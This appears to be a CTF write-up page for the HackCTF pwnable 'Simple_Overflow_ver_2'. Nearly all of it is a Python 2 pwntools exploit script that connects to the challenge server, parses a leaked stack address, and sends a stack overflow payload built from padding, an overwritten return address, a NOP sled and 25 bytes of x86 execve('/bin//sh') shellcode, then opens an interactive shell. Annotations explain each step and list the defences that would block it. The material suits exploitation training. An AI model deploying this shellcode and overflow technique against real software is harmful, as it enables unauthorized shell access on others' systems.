Pwnable/HackCTF

Simple_Overflow_ver_2

dtqdtq01 2019. 3. 30. 14:57

Simple_Overflow_ver_2

nc ctf.j0n9hyun.xyz 6982

# Solve script for the HackCTF "Simple_Overflow_ver_2" pwnable, written for
# Python 2 with pwntools (print statements, payload built from str).
# Flow: read a hex address that the service prints, then send a single line
# made of padding, a 4-byte address, a NOP sled and x86 shellcode.
# NOTE(review): the target binary is not shown on this page. The layout
# presumably relies on an unbounded read into a stack buffer, an executable
# stack, no stack canary, and the service disclosing a stack address.
# Bounded input handling, NX, a canary, or not printing the address would
# each stop it -- confirm against the binary.
from pwn import *
# Log every byte sent and received, so the whole exchange is visible.
context.log_level = 'debug'

# Open a TCP connection to the challenge service.
p = remote("ctf.j0n9hyun.xyz", 6982)
# Block until the operator presses a key before continuing.
pause()
# Print the service's first output (up to 2048 bytes).
print p.recv(2048)
# First input is a throwaway value; presumably the service echoes it together
# with the address of the buffer it was stored in -- verify against the binary.
p.sendline("0")
# Parse the first 10 bytes of the reply as hex ("0x" plus 8 digits fits a
# 32-bit address). 144 = 1 + 139 + 4, the number of payload bytes that precede
# the NOP sled below, so if the printed value is the buffer start, this result
# points at the first sled byte. Despite the name, `esp` holds that computed
# target, not the stack pointer.
# NOTE(review): recv(10) returns *up to* 10 bytes; a short read would make
# int() raise or parse a truncated value.
esp = int( p.recv(10), 16)+144
# Print the rest of the reply (presumably the "again?" prompt).
print p.recv(2048)
# Answer the prompt so the service reads a second line of input.
p.sendline("y")
# 25 bytes of 32-bit Linux x86 code: pushes the string "/bin//sh" onto the
# stack and issues int 0x80 with eax = 0x0b (execve).
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"

# Payload layout (offsets from the start of the line that is sent):
#   0        one NUL byte (its purpose is not stated on this page)
#   1..139   filler
#   140..143 little-endian 32-bit address computed above; presumably this is
#            where the saved return address sits -- TODO confirm
#   144..243 100-byte NOP sled
#   244..    shellcode
payload = "\x00" 
payload += "a" * 139
payload += p32(esp)
payload += "\x90" * 100
payload += shellcode

# Send the payload as the second input line.
p.sendline(payload)

# Hand the connection over to the operator's terminal.
p.interactive()